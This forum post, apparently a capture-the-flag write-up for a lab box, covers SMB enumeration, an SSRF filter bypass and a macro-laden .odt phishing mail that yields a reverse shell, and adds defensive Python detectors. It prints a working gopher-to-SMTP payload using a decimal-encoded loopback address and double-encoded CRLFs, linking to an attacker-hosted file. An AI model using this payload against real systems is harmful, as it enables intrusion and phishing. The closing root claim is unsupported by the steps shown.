
Live Hacking : Analyzing and hacking a website to get root access


Kingothmen

:ban: Hello! Today we will hack this website :kek:
[screenshot 1]
We start with an nmap scan. We found out that there were 8 ports open. :feelsrageman:
[screenshot 1]

Since there is an SMB port open, let's dig into whatever is inside with the help of smbmap. :kek:
[screenshot 2]

A share named "shares" can be accessed with a null session. On connecting to the share, a .backup directory was found which had a file named mail in it. :ez:
[screenshot 3]

And downloaded the mail file. :hehe:

[screenshot 4]

Upon reading the content of the mail, it is found that a user named Jocelyn is susceptible to a phishing attack and has a habit of clicking on links. Also, the important documents would now be sent internally by mail and would be using the .odt format. Also, there is a web proxy, which is less restrictive. :pepejuice:
[screenshot 5]

Upon visiting the IP it was found to be redirecting to gofer.htb. Hence it was added to /etc/hosts. Then, upon visiting the website, there was nothing peculiar that we could find. So, we tried to search for a sub-domain and found one named proxy, as suggested in the mail, which was also added to the /etc/hosts file.
[screenshot 6]

But on visiting the site, it greets us with a login page. Also, trying some common words to log in didn't work out.
[screenshot 7]

Upon testing common directories and files, only index.php returned positive. Upon verb tampering, it gave a different result, stating "Missing URL parameter !".
[screenshot 8]

So, as stated earlier in the mail, it might be an SSRF, and we could prove that it definitely is.
[screenshot 9]

SMB → Mail Crafting
So, as found in the earlier mail, we could access the internal mail server through this vulnerability and get RCE. But first we need to craft a .odt exploit and send it through mail to Jocelyn Hudson (username jhudson, as seen in the mail and the user naming convention) from the website.
[screenshot 10]

[screenshot 11]

Based on the response of the box as well as the box name, it could be assumed that the gopher:// protocol is used to send files to other users.
The following GitHub repo could help us create the payload that is required.
But somehow the payload created just didn't work. Upon careful examination of the blog from infosecwriteups, since the email is sent internally, the mail needs to be sent using the application internally rather than just sending the email. So, the payload needs to be crafted carefully as shown in the blog. Also, the system had a WAF enabled which had us on our heels, as it filtered /127 as well, which was used for reaching localhost; this was changed to 2130706433, which also resolves to 127.0.0.1.
[screenshot 12]

[screenshot 13]

The final piece in the puzzle was to register the 'Enter' key in the application, which could be achieved through \r\n.

Our payload:
gopher://2130706433:25/xHELO \r\n
MAIL FROM:<smaharjan@**********.com> \r\n
RCPT TO:<jhudson@**********.com> \r\n
DATA \r\n
From: <smaharjan@**********.com> \r\n
To: <jhudson@**********.com> \r\n
Subject: TestingTesting \r\n
\r\n
<a href='http://10.10.16.6/test.odt>hello</a> \r\n
. \r\n
QUIT \r\n

The following is the final payload for the execution.

gopher://2130706433:25/xHELO%250d%250aMAIL%20FROM%3A%3Csmaharjan@******.com%3E%250d%250aRCPT%20TO%3A%3Cjhudson@gofer.htb%3E%250d%250aDATA%250d%250aFrom%3A%20%3Csmaharjan@gofer.htb%3E%250d%250aTo%3A%20%3Cjhudson@gofer.htb%3E%250d%250a%250d%250aSubject%3A%20TestingTesting%250d%250a%250d%250a<a+href%3d'http%3a//10.10.16.6/test.odt>hello</a>%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a

Upon sending the request, the response OK was received.
[screenshot 14]
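The payload above gets past the filter for two reasons that are worth checking for on the defending side: a substring match on "127" never sees the decimal form 2130706433, and the CRLFs are double-encoded (%250d%250a), so one server-side decode still leaves them intact for the gopher handler. As an added example (not code from the original post, nor from the box), the following Python script decodes a URL parameter until it stops changing, normalises numeric host literals to a real IP address, and reports the SSRF indicators found in a few constructed access-log lines. The parameter name `url`, the log format and the sample lines are assumptions; the first line carries a trimmed copy of the gopher payload above with the addresses changed to example.com.

```python
import ipaddress
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (not taken from the original post). The
# parameter name "url" is an assumption; the post does not name it. The first
# line carries a trimmed copy of the gopher-to-SMTP payload shown above.
SAMPLE_LOG = [
    "GET /index.php?url=gopher://2130706433:25/xHELO%250d%250aMAIL%20FROM%3A%3Ca@example.com%3E%250d%250aQUIT%250d%250a HTTP/1.1",
    "GET /index.php?url=http://example.com/page HTTP/1.1",
    "GET /index.php?url=http://0x7f000001/ HTTP/1.1",
    "GET /index.php?url=http://127.0.0.1/admin HTTP/1.1",
]

ALLOWED_SCHEMES = {"http", "https"}
PARAM = re.compile(r"[?&]url=([^ &]+)")


def fully_decode(value, max_rounds=4):
    """Percent-decode until the value stops changing.

    %250d becomes %0d after one pass and a real CR after the second, which is
    how the CRLFs in the payload survive a single server-side decode."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def host_to_ip(host):
    """Return an ip_address for any numeric host literal, or None for names.

    Handles dotted quads as well as the decimal (2130706433) and hex
    (0x7f000001) spellings that a substring match on "127" never sees."""
    if not host:
        return None
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:
        return ipaddress.ip_address(int(host, 0))
    except (ValueError, OverflowError):
        return None


def analyze_url(raw_value):
    """Return the list of SSRF indicators found in one raw parameter value."""
    findings = []
    decoded = fully_decode(raw_value)
    if decoded != unquote(raw_value):
        findings.append("double-encoded")
    # Check for CR/LF before parsing: newer urlsplit() silently strips them.
    if "\r" in decoded or "\n" in decoded:
        findings.append("crlf-in-url")
    parts = urlsplit(decoded)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        findings.append("scheme:" + (parts.scheme.lower() or "none"))
    host = parts.hostname
    ip = host_to_ip(host)
    if ip is not None:
        if host != str(ip):
            findings.append(f"obfuscated-ip:{host}->{ip}")
        if ip.is_loopback or ip.is_private or ip.is_link_local:
            findings.append(f"internal-target:{ip}")
    return findings


def scan_log(lines):
    """Map each log line that carries the parameter to its findings."""
    report = {}
    for line in lines:
        match = PARAM.search(line)
        if match:
            report[line] = analyze_url(match.group(1))
    return report


if __name__ == "__main__":
    for line, findings in scan_log(SAMPLE_LOG).items():
        print("ALERT" if findings else "ok   ", findings, line.split()[1][:50])
```

The same `host_to_ip` normalisation is what the fetching code itself should apply before an allow-list check, after DNS resolution, so that a decimal, hex or rebinding host cannot reach loopback; blocking the string "127" only catches the spelling the attacker chose not to use.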


Document → RCE

For creating the malicious .odt file, it could be achieved through a macro, as it would execute certain functions and code within it upon running the file.
The following macro was created inside the file.

[screenshot 15]
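ODF documents are zip containers, and LibreOffice keeps Basic macros under a Basic/ directory inside them (scripts in other languages go under Scripts/), so a mail gateway or endpoint scanner can flag macro-bearing .odt attachments without opening them. As an added example (not code from the original post), the following Python script builds two minimal in-memory .odt files, one carrying a harmless placeholder Basic module in the layout LibreOffice uses, and reports which of them contains script entries. The file contents are constructed and stripped down to what the check needs.

```python
import io
import zipfile

ODF_TEXT_MIMETYPE = "application/vnd.oasis.opendocument.text"
# Directories inside the ODF zip where LibreOffice keeps embedded code.
SCRIPT_PREFIXES = ("Basic/", "Scripts/")


def build_sample_odt(with_macro):
    """Build a constructed, minimal .odt in memory (not a real document).

    With with_macro=True a placeholder Basic library is added in the layout
    LibreOffice uses; the module body is an empty Sub, nothing executable."""
    entries = ["content.xml"]
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        # ODF requires "mimetype" as the first entry, stored uncompressed.
        z.writestr(zipfile.ZipInfo("mimetype"), ODF_TEXT_MIMETYPE,
                   compress_type=zipfile.ZIP_STORED)
        z.writestr("content.xml", "<office:document-content/>")
        if with_macro:
            macro_entries = {
                "Basic/script-lc.xml": "<library:libraries/>",
                "Basic/Standard/script-lb.xml": "<library:library/>",
                "Basic/Standard/Module1.xml": "<script:module>Sub Main\nEnd Sub</script:module>",
            }
            for name, body in macro_entries.items():
                z.writestr(name, body)
            entries += list(macro_entries)
        manifest = "".join(f'<manifest:file-entry manifest:full-path="{e}"/>' for e in entries)
        z.writestr("META-INF/manifest.xml", f"<manifest:manifest>{manifest}</manifest:manifest>")
    return buf.getvalue()


def inspect_odt(data):
    """Report whether an ODF container carries embedded scripts.

    Looks both at the zip directory and at the manifest, so an entry that is
    listed in one but not the other is still reported."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        mimetype = z.read("mimetype").decode("ascii", "replace") if "mimetype" in names else None
        script_entries = [n for n in names if n.startswith(SCRIPT_PREFIXES)]
        manifest = ""
        if "META-INF/manifest.xml" in names:
            manifest = z.read("META-INF/manifest.xml").decode("utf-8", "replace")
    manifest_scripts = [p for p in SCRIPT_PREFIXES if f'manifest:full-path="{p}' in manifest]
    return {
        "mimetype": mimetype,
        "is_odf": mimetype is not None and mimetype.startswith("application/vnd.oasis.opendocument."),
        "has_scripts": bool(script_entries) or bool(manifest_scripts),
        "script_entries": script_entries,
    }


if __name__ == "__main__":
    for label, doc in (("clean.odt", build_sample_odt(False)), ("macro.odt", build_sample_odt(True))):
        print(label, inspect_odt(doc))
```

A hit on `has_scripts` for a document that arrived as a link in mail is exactly the pattern this write-up abuses, so it is a reasonable quarantine trigger; on the endpoint, raising LibreOffice's macro security level to High or Very High keeps such a module from running when the document is opened.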

Then the vulnerability was triggered, which requested the file and got us the reverse shell.
[screenshot 16]

[screenshot 17]

jhudson → tbuckley

Upon looking at the processes running inside the machine, we found the credentials for the user tbuckley being passed.

[screenshot 18]

— snip —
[screenshot 19]
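The credentials were readable because a process argument list is visible to every local user through /proc. As an added example (not from the original post), the following Python audit looks for password-bearing command lines, masks the secret and names the tool that leaked it; on Linux it can also walk /proc directly. The sample command lines are constructed, the patterns cover the common password-on-the-command-line forms of smbclient, curl, mysql and sshpass, and the usernames and ExamplePass values are placeholders.

```python
import os
import re

# Constructed sample process command lines (placeholders, not real secrets).
SAMPLE_CMDLINES = [
    "/usr/bin/python3 /opt/app/worker.py",
    "smbclient //fileserver/shares -U backup%ExamplePass1",
    "curl -u monitor:ExamplePass2 https://intranet.example/api/health",
    "mysql -h db.example -u app -pExamplePass3 appdb",
    "sshpass -p ExamplePass4 ssh ops@bastion.example",
]

# (tool, pattern whose group 1 is the secret). Each pattern is anchored on the
# tool name so ordinary flags such as "ssh -p 2222" are not reported.
LEAK_PATTERNS = [
    ("smbclient", re.compile(r"\bsmbclient\b.*\s-U\s+[^\s%]+%(\S+)")),
    ("curl", re.compile(r"\bcurl\b.*\s-u\s+[^:\s]+:(\S+)")),
    ("mysql", re.compile(r"\bmysql\b.*\s-p(\S+)")),
    ("sshpass", re.compile(r"\bsshpass\b.*\s-p\s+(\S+)")),
]


def find_exposed_secrets(cmdlines):
    """Return (tool, masked command line) for every line that carries a secret."""
    hits = []
    for cmdline in cmdlines:
        for tool, pattern in LEAK_PATTERNS:
            match = pattern.search(cmdline)
            if match:
                hits.append((tool, cmdline.replace(match.group(1), "*" * 8)))
                break
    return hits


def read_proc_cmdlines():
    """Linux only: collect the argv of every process visible to this user.

    With /proc mounted hidepid=2 an unprivileged user only sees its own
    processes, which is what closes this exposure for everyone else."""
    cmdlines = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                raw = f.read()
        except OSError:
            continue
        if raw:
            cmdlines.append(raw.rstrip(b"\0").replace(b"\0", b" ").decode("utf-8", "replace"))
    return cmdlines


if __name__ == "__main__":
    for tool, masked in find_exposed_secrets(SAMPLE_CMDLINES):
        print(f"[sample] [{tool}] {masked}")
    if os.path.isdir("/proc"):
        for tool, masked in find_exposed_secrets(read_proc_cmdlines()):
            print(f"[live]   [{tool}] {masked}")
```

Any hit here is a finding for the host owner: move the secret into a credentials file the tool reads itself (smbclient -A, mysql --defaults-extra-file, curl --netrc) or into the environment of the process, and mount /proc with hidepid=2 so other accounts cannot read argument lists at all.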

Successfully logged in as the user tbuckley. :pepeclap::hyperwow:
[screenshot 20]



:ricardo: That's all. We hacked the site and now we own root access! :ricardo:

You can contact me if you have any question 😜


 